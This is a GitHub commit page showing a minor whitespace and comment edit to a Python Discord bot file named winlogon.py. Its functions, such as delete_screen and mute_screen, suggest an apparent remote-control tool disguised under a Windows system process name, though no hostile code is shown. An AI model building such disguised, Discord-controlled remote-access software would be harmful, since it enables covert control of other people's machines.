We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 25294e2 commit 3dc1323Copy full SHA for 3dc1323
src/main/python/winlogon.py
@@ -8,7 +8,7 @@
8
from re import split, findall
9
10
from datetime import datetime
11
-# import time as time_class
+# import time
12
13
from discord.ext import commands
14
from discord import Game, Embed
@@ -120,8 +120,9 @@ async def delete_screen():
120
await asyncio.sleep(0.5)
121
# print("I couldn't delete screen!")
122
else:
123
- pass
124
# print("exist - " + str(File.exist("screen.png")))
+ pass
125
+
126
127
@staticmethod
128
async def mute_screen():
@@ -1456,4 +1457,4 @@ async def on_message(message):
1456
1457
print("Ошибка")
1458
1459
-client.run(token)
1460
+client.run(token)
0 commit comments